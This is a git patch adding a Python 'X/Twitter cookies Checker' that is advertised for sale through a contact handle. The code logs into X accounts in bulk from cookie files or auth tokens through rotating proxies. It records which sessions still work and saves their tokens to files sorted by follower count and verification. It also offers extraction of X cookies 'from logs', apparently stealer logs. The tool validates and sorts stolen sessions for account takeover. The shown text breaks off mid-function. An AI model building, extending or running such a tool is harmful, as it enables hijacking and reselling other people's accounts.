From fcc96c3e3520ebd2e77ac5508ef2317dc478b8b8 Mon Sep 17 00:00:00 2001 From: ether Date: Wed, 21 Jan 2026 04:25:00 +0200 Subject: [PATCH] asdfas --- .gitignore | 4 + account_checker.py | 138 +++++ auth_token_handler.py | 30 ++ cookie_parser.py | 125 +++++ debug_logger.py | 59 +++ file_utils.py | 262 ++++++++++ fix_cookies.py | 105 ++++ format_converter.py | 53 ++ main.py | 1081 +++++++++++++++++++++++++++++++++++++++ proxy_handler.py | 66 +++ test_single_cookie.py | 118 +++++ twitter_auth_cookies.py | 608 ++++++++++++++++++++++ 12 files changed, 2649 insertions(+) create mode 100644 .gitignore create mode 100644 account_checker.py create mode 100644 auth_token_handler.py create mode 100644 cookie_parser.py create mode 100644 debug_logger.py create mode 100644 file_utils.py create mode 100644 fix_cookies.py create mode 100644 format_converter.py create mode 100644 main.py create mode 100644 proxy_handler.py create mode 100644 test_single_cookie.py create mode 100644 twitter_auth_cookies.py diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..6a92f7d --- /dev/null +++ b/.gitignore @@ -0,0 +1,4 @@ +*.txt +__MACOSX +__pycache__ +.DS_STORE diff --git a/account_checker.py b/account_checker.py new file mode 100644 index 0000000..d5689a0 --- /dev/null +++ b/account_checker.py @@ -0,0 +1,138 @@ +import asyncio +import random +from pathlib import Path +from typing import Optional, List, Union, Dict, Tuple +from tweety import TwitterAsync +from tweety.types import Proxy +from cookie_parser import read_cookies_file, clean_cookie_content +import debug_logger as log + + +async def authenticate_twitter(cookies: Union[str, Dict] = None, auth_token: str = None, proxy: Optional[Proxy] = None) -> TwitterAsync: + log.debug(f"authenticate_twitter called - cookies: {bool(cookies)}, auth_token: {bool(auth_token)}, proxy: {bool(proxy)}") + + try: + if proxy: + log.debug(f"Creating TwitterAsync with proxy: {proxy.host}:{proxy.port}") + app = TwitterAsync("temp_session", proxy=proxy) + else: + log.debug("Creating TwitterAsync without proxy") + app = TwitterAsync("temp_session") + + if auth_token: + log.debug(f"Loading auth_token: {auth_token[:20]}...") + await app.load_auth_token(auth_token) + elif cookies: + log.debug(f"Loading cookies (length: {len(str(cookies))})") + log.debug(f"Cookies preview: {str(cookies)[:200]}...") + await app.load_cookies(cookies) + + log.debug("Authentication object created successfully") + return app + except Exception as e: + log.error(f"Error in authenticate_twitter: {e}") + log.exception("Full traceback:") + raise + + +async def check_account(cookie_file: Path, proxies: List[Proxy], output_dir: Path, semaphore: asyncio.Semaphore, cookies_only_mode: bool = False, user_data_list=None) -> Tuple[bool, bool, str]: + async with semaphore: + log.info(f"=== Checking account: {cookie_file.name} ===") + try: + try: + log.debug(f"Reading cookie file: {cookie_file}") + cookies_string = read_cookies_file(str(cookie_file)) + if not cookies_string: + log.error(f"Failed to parse cookie file: {cookie_file.name}") + return (False, False, "Failed to parse cookie file") + log.debug(f"Cookies parsed successfully, length: {len(cookies_string)}") + + cleaned_content = clean_cookie_content(cookie_file.read_text(encoding='utf-8')) + log.debug(f"Cleaned content length: {len(cleaned_content)}") + except Exception as e: + log.error(f"Failed to read cookies from {cookie_file.name}: {e}") + log.exception("Cookie read exception:") + return (False, False, f"Failed to read cookies: {e}") + + proxy = random.choice(proxies) if proxies else None + if proxy: + log.debug(f"Using proxy: {proxy.host}:{proxy.port}") + else: + log.debug("No proxy being used") + + try: + log.debug("Attempting to authenticate...") + app = await authenticate_twitter(cookies=cookies_string, proxy=proxy) + log.debug("Authentication completed") + except Exception as e: + log.error(f"Authentication error for {cookie_file.name}: {e}") + log.exception("Authentication exception:") + return (False, False, f"Authentication error: {e}") + + try: + log.debug("Checking app.me...") + if app.me: + user = app.me + log.info(f"✓ Successfully authenticated as @{user.username}") + log.debug(f"User details - Followers: {user.followers_count}, Verified: {user.verified}") + is_verified = user.verified + + try: + from file_utils import save_account_info + from main import config + save_format = config.get('save_format', 'auth_token') + log.debug(f"Saving account info in {save_format} format") + save_account_info(user, cookie_file, output_dir, cleaned_content, cookies_only_mode, save_format, user_data_list) + log.debug("Account info saved successfully") + except Exception as e: + log.error(f"Failed to save account info: {e}") + log.exception("Save exception:") + pass + + return (True, is_verified, f"@{user.username}") + else: + log.error(f"app.me is None for {cookie_file.name}") + return (False, False, "Authentication failed - invalid cookies") + except Exception as e: + log.error(f"Error processing user info for {cookie_file.name}: {e}") + log.exception("User info exception:") + return (False, False, f"Error processing user info: {e}") + + except Exception as e: + log.error(f"Unexpected error for {cookie_file.name}: {e}") + log.exception("Unexpected exception:") + return (False, False, f"Unexpected error: {e}") + + +async def check_account_by_token(auth_token: str, token_file: Path, token_line_num: int, proxies: List[Proxy], output_dir: Path, semaphore: asyncio.Semaphore, cookies_only_mode: bool = False, user_data_list=None) -> Tuple[bool, bool, str]: + async with semaphore: + try: + token_source = f"{token_file.name}:line-{token_line_num}" + proxy = random.choice(proxies) if proxies else None + + try: + app = await authenticate_twitter(auth_token=auth_token, proxy=proxy) + except Exception as e: + return (False, False, f"Authentication error: {e}") + + try: + if app.me: + user = app.me + is_verified = user.verified + + try: + from file_utils import save_account_info_token + from main import config + save_format = config.get('save_format', 'auth_token') + save_account_info_token(user, auth_token, token_source, output_dir, cookies_only_mode, save_format, user_data_list) + except Exception: + pass + + return (True, is_verified, f"@{user.username}") + else: + return (False, False, "Authentication failed - invalid token") + except Exception as e: + return (False, False, f"Error processing user info: {e}") + + except Exception as e: + return (False, False, f"Unexpected error: {e}") diff --git a/auth_token_handler.py b/auth_token_handler.py new file mode 100644 index 0000000..1516e01 --- /dev/null +++ b/auth_token_handler.py @@ -0,0 +1,30 @@ +from pathlib import Path +from typing import List + + +def scan_auth_tokens_directory(dir_path: str): + path = Path(dir_path).expanduser().resolve() + + if not path.exists(): + path = Path.cwd() / dir_path + if not path.exists(): + raise FileNotFoundError(f"Path not found: {dir_path}") + + if path.is_file(): + return [path] + + token_files = list(path.glob('*.txt')) + return sorted(token_files) + + +def read_auth_tokens_from_file(file_path: Path) -> List[tuple]: + try: + content = file_path.read_text(encoding='utf-8').strip() + tokens = [] + for line_num, line in enumerate(content.split('\n'), start=1): + line = line.strip() + if line: + tokens.append((line_num, line)) + return tokens + except Exception: + return [] diff --git a/cookie_parser.py b/cookie_parser.py new file mode 100644 index 0000000..343ecc7 --- /dev/null +++ b/cookie_parser.py @@ -0,0 +1,125 @@ +import json +from pathlib import Path +from typing import Dict +import debug_logger as log + + +def clean_cookie_content(content: str) -> str: + lines = content.strip().split('\n') + cleaned_lines = [] + + content_stripped = content.strip() + if content_stripped.startswith('[') or content_stripped.startswith('{'): + bracket_count = 0 + brace_count = 0 + json_end = 0 + + for i, char in enumerate(content_stripped): + if char == '[': + bracket_count += 1 + elif char == ']': + bracket_count -= 1 + if bracket_count == 0 and content_stripped[0] == '[': + json_end = i + 1 + break + elif char == '{': + brace_count += 1 + elif char == '}': + brace_count -= 1 + if brace_count == 0 and content_stripped[0] == '{': + json_end = i + 1 + break + + if json_end > 0: + return content_stripped[:json_end] + + for line in lines: + line = line.strip() + if not line: + continue + if line.startswith('#'): + cleaned_lines.append(line) + continue + parts = line.split('\t') + if len(parts) >= 7: + try: + int(parts[4]) + cleaned_lines.append(line) + except ValueError: + continue + + return '\n'.join(cleaned_lines) if cleaned_lines else content + + +def netscape_to_dict(netscape_content: str) -> Dict[str, str]: + cookies = {} + for line in netscape_content.strip().split('\n'): + if line.startswith('#') or not line.strip(): + continue + parts = line.split('\t') + if len(parts) >= 7: + cookies[parts[5]] = parts[6] + return cookies + + +def json_to_dict(json_content: str) -> Dict[str, str]: + cookies = {} + data = json.loads(json_content) + + if isinstance(data, list): + for cookie in data: + if 'name' in cookie and 'value' in cookie: + cookies[cookie['name']] = cookie['value'] + elif isinstance(data, dict): + cookies = data + + return cookies + + +def dict_to_cookie_string(cookies: Dict[str, str]) -> str: + return "; ".join([f"{name}={value}" for name, value in cookies.items()]) + + +def read_cookies_file(file_path: str) -> str: + log.debug(f"read_cookies_file called for: {file_path}") + path = Path(file_path) + if not path.exists(): + log.error(f"Cookie file does not exist: {file_path}") + return None + + try: + content = path.read_text(encoding='utf-8') + log.debug(f"File content read, length: {len(content)}") + log.debug(f"First 200 chars: {content[:200]}") + except Exception as e: + log.error(f"Failed to read file {file_path}: {e}") + return None + + content = clean_cookie_content(content) + log.debug(f"After cleaning, content length: {len(content) if content else 0}") + if not content: + log.error(f"Content is empty after cleaning for {file_path}") + return None + + cookies_dict = {} + try: + log.debug("Attempting to parse as JSON...") + cookies_dict = json_to_dict(content) + log.debug(f"Parsed as JSON, {len(cookies_dict)} cookies found") + except json.JSONDecodeError as e: + log.debug(f"Not JSON format: {e}, trying Netscape format...") + try: + cookies_dict = netscape_to_dict(content) + log.debug(f"Parsed as Netscape, {len(cookies_dict)} cookies found") + except Exception as e: + log.error(f"Failed to parse as Netscape: {e}") + return None + + if not cookies_dict: + log.error(f"No cookies found in dictionary for {file_path}") + return None + + log.debug(f"Cookie names found: {list(cookies_dict.keys())}") + cookie_string = dict_to_cookie_string(cookies_dict) + log.debug(f"Final cookie string length: {len(cookie_string)}") + return cookie_string diff --git a/debug_logger.py b/debug_logger.py new file mode 100644 index 0000000..51e592c --- /dev/null +++ b/debug_logger.py @@ -0,0 +1,59 @@ +import logging +import sys +from pathlib import Path +from datetime import datetime + +# Create logs directory +logs_dir = Path("logs") +logs_dir.mkdir(exist_ok=True) + +# Configure logging +log_file = logs_dir / f"debug_{datetime.now().strftime('%Y%m%d_%H%M%S')}.log" + +# Create logger +logger = logging.getLogger('TwitterChecker') +logger.setLevel(logging.DEBUG) + +# File handler - detailed logs +file_handler = logging.FileHandler(log_file, encoding='utf-8') +file_handler.setLevel(logging.DEBUG) +file_formatter = logging.Formatter( + '%(asctime)s | %(levelname)8s | %(filename)s:%(lineno)d | %(message)s', + datefmt='%Y-%m-%d %H:%M:%S' +) +file_handler.setFormatter(file_formatter) + +# Console handler - important messages only +console_handler = logging.StreamHandler(sys.stdout) +console_handler.setLevel(logging.INFO) +console_formatter = logging.Formatter( + '\033[1;35m[DEBUG]\033[0m %(message)s' +) +console_handler.setFormatter(console_formatter) + +# Add handlers +logger.addHandler(file_handler) +logger.addHandler(console_handler) + +def debug(msg): + """Log debug message""" + logger.debug(msg) + +def info(msg): + """Log info message""" + logger.info(msg) + +def warning(msg): + """Log warning message""" + logger.warning(msg) + +def error(msg): + """Log error message""" + logger.error(msg) + +def exception(msg): + """Log exception with traceback""" + logger.exception(msg) + +# Print initial message +info(f"Debug logging initialized. Log file: {log_file}") diff --git a/file_utils.py b/file_utils.py new file mode 100644 index 0000000..1b5dc04 --- /dev/null +++ b/file_utils.py @@ -0,0 +1,262 @@ +from pathlib import Path +from datetime import datetime + + +def save_in_format(user, content: str, content_type: str, output_dir: Path, save_format: str): + from format_converter import cookies_dict_to_netscape, cookies_dict_to_json, extract_auth_token_from_cookies, parse_cookie_string + + output_dir.mkdir(exist_ok=True) + + username = user.username + verified_status = "verified" if user.verified else "unverified" + followers = user.followers_count + posts = user.statuses_count + + filename = f"{verified_status} - {followers} followers - {posts} posts - @{username}.txt" + info_file = output_dir / filename + + if save_format == 'auth_token': + if content_type == 'cookies': + cookies_dict = parse_cookie_string(content) + auth_token = extract_auth_token_from_cookies(cookies_dict) + info_file.write_text(auth_token, encoding='utf-8') + else: + info_file.write_text(content, encoding='utf-8') + elif save_format == 'netscape': + if content_type == 'cookies': + cookies_dict = parse_cookie_string(content) + netscape_content = cookies_dict_to_netscape(cookies_dict) + info_file.write_text(netscape_content, encoding='utf-8') + else: + info_file.write_text(content, encoding='utf-8') + elif save_format == 'json': + if content_type == 'cookies': + cookies_dict = parse_cookie_string(content) + json_content = cookies_dict_to_json(cookies_dict) + info_file.write_text(json_content, encoding='utf-8') + else: + info_file.write_text(content, encoding='utf-8') + + return info_file + + +def scan_cookies_directory(dir_path: str): + path = Path(dir_path).expanduser().resolve() + + if not path.exists(): + path = Path.cwd() / dir_path + if not path.exists(): + raise FileNotFoundError(f"Path not found: {dir_path}") + + if path.is_file(): + return [path] + + cookie_files = [] + for ext in ['*.json', '*.txt']: + cookie_files.extend(path.glob(ext)) + + return sorted(cookie_files) + + +def save_account_info(user, cookie_file: Path, output_dir: Path, cleaned_cookies: str = None, cookies_only_mode: bool = False, save_format: str = 'auth_token', user_data_list=None): + if user_data_list is not None: + user_data_list.append({ + 'user': user, + 'cookie_file': cookie_file, + 'cleaned_cookies': cleaned_cookies, + 'content_type': 'cookies' + }) + + if cookies_only_mode: + return save_in_format(user, cleaned_cookies or cookie_file.read_text(encoding='utf-8'), 'cookies', output_dir, save_format) + + output_dir.mkdir(exist_ok=True) + + username = user.username + verified_status = "verified" if user.verified else "unverified" + followers = user.followers_count + posts = user.statuses_count + + filename = f"{verified_status} - {followers} followers - {posts} posts - @{username}.txt" + info_file = output_dir / filename + + if cleaned_cookies: + cookie_content = cleaned_cookies + else: + cookie_content = cookie_file.read_text(encoding='utf-8') + + verified_type = None + verified_label = None + + if isinstance(user, dict): + verified_type = user.get('verified_type') or user.get('ext_verified_type') + verified_label = user.get('verified_label') + + if 'legacy' in user and isinstance(user['legacy'], dict): + if not verified_type: + verified_type = user['legacy'].get('verified_type') + + if 'ext_is_blue_verified' in user: + if user['ext_is_blue_verified']: + verified_type = verified_type or 'Blue' + + from format_converter import parse_cookie_string, extract_auth_token_from_cookies, cookies_dict_to_netscape, cookies_dict_to_json + + if save_format == 'auth_token': + from cookie_parser import read_cookies_file + cookies_string = read_cookies_file(str(cookie_file)) + if cookies_string: + cookies_dict = parse_cookie_string(cookies_string) + auth_token = extract_auth_token_from_cookies(cookies_dict) + if auth_token: + cookie_content = auth_token + else: + cookie_content = cleaned_cookies or cookie_file.read_text(encoding='utf-8') + else: + cookie_content = cleaned_cookies or cookie_file.read_text(encoding='utf-8') + elif save_format == 'netscape': + from cookie_parser import read_cookies_file + cookies_string = read_cookies_file(str(cookie_file)) + if cookies_string: + cookies_dict = parse_cookie_string(cookies_string) + cookie_content = cookies_dict_to_netscape(cookies_dict) + else: + cookie_content = cleaned_cookies or cookie_file.read_text(encoding='utf-8') + elif save_format == 'json': + from cookie_parser import read_cookies_file + cookies_string = read_cookies_file(str(cookie_file)) + if cookies_string: + cookies_dict = parse_cookie_string(cookies_string) + cookie_content = cookies_dict_to_json(cookies_dict) + else: + cookie_content = cleaned_cookies or cookie_file.read_text(encoding='utf-8') + else: + cookie_content = cleaned_cookies or cookie_file.read_text(encoding='utf-8') + + verification_parts = [] + if user.verified: + verification_parts.append("Verified: Yes") + if verified_type: + verification_parts.append(f"Type: {verified_type}") + if verified_label: + verification_parts.append(f"Label: {verified_label}") + else: + verification_parts.append("Verified: No") + + verification_line = " | ".join(verification_parts) + + try: + if isinstance(user.created_at, str): + from dateutil import parser + created_date = parser.parse(user.created_at) + created_str = created_date.strftime("%d.%m.%Y %H:%M") + else: + created_str = user.created_at.strftime("%d.%m.%Y %H:%M") + except: + created_str = str(user.created_at) + + cookie_content = cookie_content.replace('.twitter.com', '.x.com').replace('twitter.com', 'x.com') + + info_lines = [ + "=" * 80, + f"Checked: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}", + "", + f"ID: {user.id} | Name: {user.name} | Username: @{username}", + f"Followers: {user.followers_count:,} | Following: {user.friends_count:,}", + f"Tweets: {user.statuses_count:,} | Likes: {user.favourites_count:,}", + verification_line, + f"Created: {created_str}", + f"Profile: https://x.com/{username}", + "", + f"Cookie file: {cookie_file.absolute()}", + "", + "=" * 80, + cookie_content, + ] + + info_file.write_text('\n'.join(info_lines), encoding='utf-8') + return info_file + + +def save_account_info_token(user, auth_token: str, token_source: str, output_dir: Path, cookies_only_mode: bool = False, save_format: str = 'auth_token', user_data_list=None): + if user_data_list is not None: + user_data_list.append({ + 'user': user, + 'auth_token': auth_token, + 'token_source': token_source, + 'content_type': 'token' + }) + + if cookies_only_mode: + return save_in_format(user, auth_token, 'token', output_dir, save_format) + + output_dir.mkdir(exist_ok=True) + + username = user.username + verified_status = "verified" if user.verified else "unverified" + followers = user.followers_count + posts = user.statuses_count + + filename = f"{verified_status} - {followers} followers - {posts} posts - @{username}.txt" + info_file = output_dir / filename + + if cookies_only_mode: + info_file.write_text(auth_token, encoding='utf-8') + return info_file + + verified_type = None + verified_label = None + + if isinstance(user, dict): + verified_type = user.get('verified_type') or user.get('ext_verified_type') + verified_label = user.get('verified_label') + + if 'legacy' in user and isinstance(user['legacy'], dict): + if not verified_type: + verified_type = user['legacy'].get('verified_type') + + if 'ext_is_blue_verified' in user: + if user['ext_is_blue_verified']: + verified_type = verified_type or 'Blue' + + verification_parts = [] + if user.verified: + verification_parts.append("Verified: Yes") + if verified_type: + verification_parts.append(f"Type: {verified_type}") + if verified_label: + verification_parts.append(f"Label: {verified_label}") + else: + verification_parts.append("Verified: No") + + verification_line = " | ".join(verification_parts) + + try: + if isinstance(user.created_at, str): + from dateutil import parser + created_date = parser.parse(user.created_at) + created_str = created_date.strftime("%d.%m.%Y %H:%M") + else: + created_str = user.created_at.strftime("%d.%m.%Y %H:%M") + except: + created_str = str(user.created_at) + + info_lines = [ + "=" * 80, + f"Checked: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}", + "", + f"ID: {user.id} | Name: {user.name} | Username: @{username}", + f"Followers: {user.followers_count:,} | Following: {user.friends_count:,}", + f"Tweets: {user.statuses_count:,} | Likes: {user.favourites_count:,}", + verification_line, + f"Created: {created_str}", + f"Profile: https://x.com/{username}", + "", + f"Token source: {token_source}", + "", + "=" * 80, + auth_token, + ] + + info_file.write_text('\n'.join(info_lines), encoding='utf-8') + return info_file diff --git a/fix_cookies.py b/fix_cookies.py new file mode 100644 index 0000000..0802831 --- /dev/null +++ b/fix_cookies.py @@ -0,0 +1,105 @@ +#!/usr/bin/env python3 + +import json +import sys +from pathlib import Path + + +def fix_malformed_cookie_file(file_path): + """Fixes malformed cookie files where Netscape format is embedded in JSON""" + try: + with open(file_path, 'r', encoding='utf-8') as f: + content = f.read() + + # Try to parse as JSON + try: + data = json.loads(content) + except: + print(f"Skipping {file_path.name} - not valid JSON") + return False + + # Check if it's a malformed cookie file + if isinstance(data, list) and len(data) > 0: + first_item = data[0] + if 'name' in first_item and '\t' in str(first_item['name']): + # This is malformed - Netscape format embedded in name field + name_value = first_item['name'] + value_field = first_item.get('value', '') + + # Combine name and value to get full Netscape format + netscape_content = name_value + '\n' + value_field + + # Parse Netscape format into proper JSON + cookies = [] + for line in netscape_content.split('\n'): + line = line.strip() + if not line or line.startswith('#'): + continue + + parts = line.split('\t') + if len(parts) >= 7: + cookie = { + "domain": parts[0], + "flag": parts[1] == "TRUE", + "path": parts[2], + "secure": parts[3] == "TRUE", + "expiration": int(parts[4]) if parts[4].isdigit() else 0, + "name": parts[5], + "value": parts[6] + } + cookies.append(cookie) + + if cookies: + # Save fixed JSON + with open(file_path, 'w', encoding='utf-8') as f: + json.dump(cookies, f, indent=2) + return True + + return False + + except Exception as e: + print(f"Error processing {file_path.name}: {e}") + return False + + +def main(): + if len(sys.argv) > 1: + # Process specific directory + target_dir = Path(sys.argv[1]) + else: + # Process current directory + target_dir = Path.cwd() + + if not target_dir.exists(): + print(f"Directory not found: {target_dir}") + return + + print(f"Scanning directory: {target_dir}") + print() + + # Find all .txt and .json files + cookie_files = list(target_dir.glob("*.txt")) + list(target_dir.glob("*.json")) + + if not cookie_files: + print("No cookie files found (.txt or .json)") + return + + print(f"Found {len(cookie_files)} file(s)") + print() + + fixed_count = 0 + + for cookie_file in cookie_files: + if fix_malformed_cookie_file(cookie_file): + print(f"✓ Fixed: {cookie_file.name}") + fixed_count += 1 + + print() + print("=" * 70) + print(f"Total files scanned: {len(cookie_files)}") + print(f"Files fixed: {fixed_count}") + print("=" * 70) + + +if __name__ == "__main__": + main() diff --git a/format_converter.py b/format_converter.py new file mode 100644 index 0000000..2e4ead7 --- /dev/null +++ b/format_converter.py @@ -0,0 +1,53 @@ +import json +from pathlib import Path +from typing import Dict + + +def cookies_dict_to_netscape(cookies: Dict[str, str], domain: str = ".x.com") -> str: + netscape_lines = [] + + for name, value in cookies.items(): + path = "/" + secure = "TRUE" + http_only = "FALSE" + expiry = "1735689600" + + line = f"{domain}\tTRUE\t{path}\t{secure}\t{expiry}\t{name}\t{value}" + netscape_lines.append(line) + + return '\n'.join(netscape_lines) + + +def cookies_dict_to_json(cookies: Dict[str, str], domain: str = ".x.com") -> str: + json_cookies = [] + + for name, value in cookies.items(): + cookie_obj = { + "domain": domain, + "expirationDate": 1735689600, + "hostOnly": False, + "httpOnly": False, + "name": name, + "path": "/", + "sameSite": "no_restriction", + "secure": True, + "session": False, + "storeId": None, + "value": value + } + json_cookies.append(cookie_obj) + + return json.dumps(json_cookies, indent=2) + + +def extract_auth_token_from_cookies(cookies: Dict[str, str]) -> str: + return cookies.get('auth_token', '') + + +def parse_cookie_string(cookie_string: str) -> Dict[str, str]: + cookies = {} + for pair in cookie_string.split('; '): + if '=' in pair: + name, value = pair.split('=', 1) + cookies[name] = value + return cookies diff --git a/main.py b/main.py new file mode 100644 index 0000000..1cc5d3a --- /dev/null +++ b/main.py @@ -0,0 +1,1081 @@ +#!/usr/bin/env python3 + +import sys +import asyncio +import json +from pathlib import Path +from datetime import datetime +from file_utils import scan_cookies_directory, save_account_info_token +from proxy_handler import read_proxy_file +from account_checker import check_account, check_account_by_token +from auth_token_handler import scan_auth_tokens_directory, read_auth_tokens_from_file +import debug_logger as log + + +CONFIG_FILE = Path("config.json") + +def load_config(): + default_config = { + 'cookies_dir': 'cookies', + 'output_dir': 'results', + 'cookies_only_mode': False, + 'threads': 1, + 'use_proxy': True, + 'auth_mode': 'cookies', + 'save_format': 'auth_token', + 'filter_enabled': False, + 'filter_min_followers': 0, + 'filter_max_followers': 0, + 'filter_min_posts': 0, + 'filter_min_likes': 0, + 'filter_verified_only': False, + 'filtered_output_dir': 'filtered' + } + + if CONFIG_FILE.exists(): + try: + with open(CONFIG_FILE, 'r') as f: + loaded = json.load(f) + default_config.update(loaded) + except: + pass + + return default_config + +def save_config(cfg): + try: + with open(CONFIG_FILE, 'w') as f: + json.dump(cfg, f, indent=2) + except: + pass + +config = load_config() + + +def print_banner(): + print("\033[2J\033[H", end='') + print("\033[1;36m" + "=" * 70) + print("██╗ ██╗ ██████╗██╗ ██╗███████╗ ██████╗██╗ ██╗███████╗██████╗ ") + print("╚██╗██╔╝ ██╔════╝██║ ██║██╔════╝██╔════╝██║ ██╔╝██╔════╝██╔══██╗") + print(" ╚███╔╝ ██║ ███████║█████╗ ██║ █████╔╝ █████╗ ██████╔╝") + print(" ██╔██╗ ██║ ██╔══██║██╔══╝ ██║ ██╔═██╗ ██╔══╝ ██╔══██╗") + print("██╔╝ ██╗ ╚██████╗██║ ██║███████╗╚██████╗██║ ██╗███████╗██║ ██║") + print("╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝") + print("=" * 70) + print("\033[1;33m X/Twitter cookies Checker") + print("\033[1;35m Contact: @CrystalStud for support/buy") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print() + + +def print_menu(): + print("\n\033[1;32m┌─────────────────────────────────────┐") + print("│ MAIN MENU │") + print("└─────────────────────────────────────┘\033[0m\n") + print("\033[1;37m[1]\033[0m Check Accounts") + print("\033[1;37m[2]\033[0m Filter Accounts") + print("\033[1;37m[3]\033[0m Extract Auth Tokens") + print("\033[1;37m[4]\033[0m Convert Cookie Format") + print("\033[1;37m[5]\033[0m Extract X.com Cookies from Logs") + print("\033[1;37m[6]\033[0m Settings") + print("\033[1;37m[7]\033[0m About") + print("\033[1;37m[0]\033[0m Exit") + print() + + +def get_input(prompt, default=None): + if default: + user_input = input(f"\033[1;33m{prompt}\033[0m [\033[1;36m{default}\033[0m]: ").strip() + return user_input if user_input else default + else: + return input(f"\033[1;33m{prompt}\033[0m: ").strip() + + +def print_success(msg): + print(f"\033[1;32m✓\033[0m {msg}") + + +def print_error(msg): + print(f"\033[1;31m✗\033[0m {msg}") + + +def print_info(msg): + print(f"\033[1;34mℹ\033[0m {msg}") + + +async def process_batch(batch, proxies, output_dir, semaphore, cookies_only_mode, results, user_data_list=None): + tasks = [] + for cookie_file in batch: + task = check_account(cookie_file, proxies, output_dir, semaphore, cookies_only_mode, user_data_list) + tasks.append(task) + + batch_results = await asyncio.gather(*tasks) + for success, verified, msg in batch_results: + results.append((success, verified)) + + +async def process_batch_tokens(batch, proxies, output_dir, semaphore, cookies_only_mode, results, user_data_list=None): + tasks = [] + for token_file, token_line_num, auth_token in batch: + task = check_account_by_token(auth_token, token_file, token_line_num, proxies, output_dir, semaphore, cookies_only_mode, user_data_list) + tasks.append(task) + + batch_results = await asyncio.gather(*tasks) + for success, verified, msg in batch_results: + results.append((success, verified)) + + +async def run_checker(cookies_path, proxy_file=None): + log.info("=" * 80) + log.info("Starting checker run") + log.info(f"Cookies path: {cookies_path}") + log.info(f"Proxy file: {proxy_file}") + log.info(f"Config: {config}") + log.info("=" * 80) + + start_time = datetime.now() + output_dir = Path(config['output_dir']) + output_dir.mkdir(exist_ok=True) + + try: + print_info(f"Scanning for cookies in: {cookies_path}") + log.debug(f"Scanning directory: {cookies_path}") + cookie_files = scan_cookies_directory(cookies_path) + log.info(f"Found {len(cookie_files) if cookie_files else 0} cookie files") + + if not cookie_files: + print_error("No cookie files found (.json or .txt)") + return + + print_success(f"Found {len(cookie_files)} cookie file(s)") + + proxies = [] + if proxy_file: + print_info(f"Loading proxies from: {proxy_file}") + try: + proxies = read_proxy_file(proxy_file) + if not proxies: + print_error("No valid proxies found, continuing without proxy") + except: + print_error("Failed to load proxies, continuing without proxy") + + print() + print("\033[1;36m" + "=" * 70 + "\033[0m") + print("\033[1;37m CHECKING ACCOUNTS\033[0m") + print(f"\033[1;35m Threads: {config['threads']}\033[0m") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print() + + num_threads = config['threads'] + concurrent_per_thread = 5 + batch_size = len(cookie_files) // num_threads + batches = [] + + for i in range(num_threads): + start_idx = i * batch_size + if i == num_threads - 1: + end_idx = len(cookie_files) + else: + end_idx = (i + 1) * batch_size + batches.append(cookie_files[start_idx:end_idx]) + + semaphore = asyncio.Semaphore(concurrent_per_thread) + results = [] + user_data_list = [] + + check_start_time = datetime.now() + total_checked = 0 + + async def monitor_progress(): + nonlocal total_checked + while total_checked < len(cookie_files): + await asyncio.sleep(0.3) + checked = len(results) + if checked != total_checked: + total_checked = checked + successful = sum(1 for s, v in results if s) + failed = sum(1 for s, v in results if not s) + verified_count = sum(1 for s, v in results if s and v) + remaining = len(cookie_files) - total_checked + + if total_checked > 0 and remaining > 0: + elapsed = (datetime.now() - check_start_time).total_seconds() + avg_time = elapsed / total_checked + eta_seconds = avg_time * remaining + eta_str = f"{int(eta_seconds // 60)}m {int(eta_seconds % 60)}s" + else: + eta_str = "calculating..." + + progress_bar = "█" * (total_checked * 40 // len(cookie_files)) + "░" * (40 - total_checked * 40 // len(cookie_files)) + print(f"\r\033[1;36m[{progress_bar}]\033[0m {total_checked}/{len(cookie_files)} | \033[1;32m✓{successful}\033[0m | \033[1;31m✗{failed}\033[0m | \033[1;33m★{verified_count}\033[0m | ETA: {eta_str} ", end='', flush=True) + + monitor_task = asyncio.create_task(monitor_progress()) + + batch_tasks = [] + for batch in batches: + task = process_batch(batch, proxies, output_dir, semaphore, config['cookies_only_mode'], results, user_data_list) + batch_tasks.append(task) + + await asyncio.gather(*batch_tasks) + await monitor_task + + successful = sum(1 for s, v in results if s) + failed = sum(1 for s, v in results if not s) + verified_count = sum(1 for s, v in results if s and v) + + print() + print() + + end_time = datetime.now() + elapsed_time = end_time - start_time + elapsed_seconds = elapsed_time.total_seconds() + + print("\033[1;36m" + "=" * 70 + "\033[0m") + print("\033[1;37m SUMMARY\033[0m") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print(f"\033[1;37mTotal accounts:\033[0m {len(cookie_files)}") + print(f"\033[1;32m✓ Successful:\033[0m {successful}") + print(f"\033[1;31m✗ Failed:\033[0m {failed}") + print(f"\033[1;33m★ Verified:\033[0m {verified_count}") + print(f"\033[1;35m⏱ Time elapsed:\033[0m {elapsed_seconds:.2f}s") + print(f"\033[1;34m📁 Results saved to:\033[0m {output_dir.absolute()}/") + print("\033[1;36m" + "=" * 70 + "\033[0m") + + summary_file = output_dir / f"summary_{datetime.now().strftime('%Y%m%d_%H%M%S')}.txt" + summary_lines = [ + "=" * 80, + "X Checker, contact @CrystalStud for support", + "=" * 80, + f"Date: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}", + "", + "Results:", + f" Total accounts checked: {len(cookie_files)}", + f" Valid accounts: {successful}", + f" Invalid accounts: {failed}", + f" Verified accounts: {verified_count}", + "", + "Performance:", + f" Time elapsed: {elapsed_seconds:.2f}s", + f" Average per account: {elapsed_seconds/len(cookie_files):.2f}s", + "", + "Configuration:", + f" Proxies loaded: {len(proxies) if proxies else 0}", + f" Cookie files: {len(cookie_files)}", + "", + "=" * 80, + ] + summary_file.write_text('\n'.join(summary_lines), encoding='utf-8') + print_success(f"Summary saved to: {summary_file.name}") + + try: + session_file = Path("temp_session.tw_session") + if session_file.exists(): + session_file.unlink() + except: + pass + + except FileNotFoundError as e: + print_error(f"Error: {e}") + except Exception as e: + print_error(f"Unexpected error: {e}") + + +async def run_checker_tokens(tokens_path, proxy_file=None): + start_time = datetime.now() + output_dir = Path(config['output_dir']) + output_dir.mkdir(exist_ok=True) + + try: + print_info(f"Scanning for auth tokens in: {tokens_path}") + token_files = scan_auth_tokens_directory(tokens_path) + + if not token_files: + print_error("No token files found (.txt)") + return + + 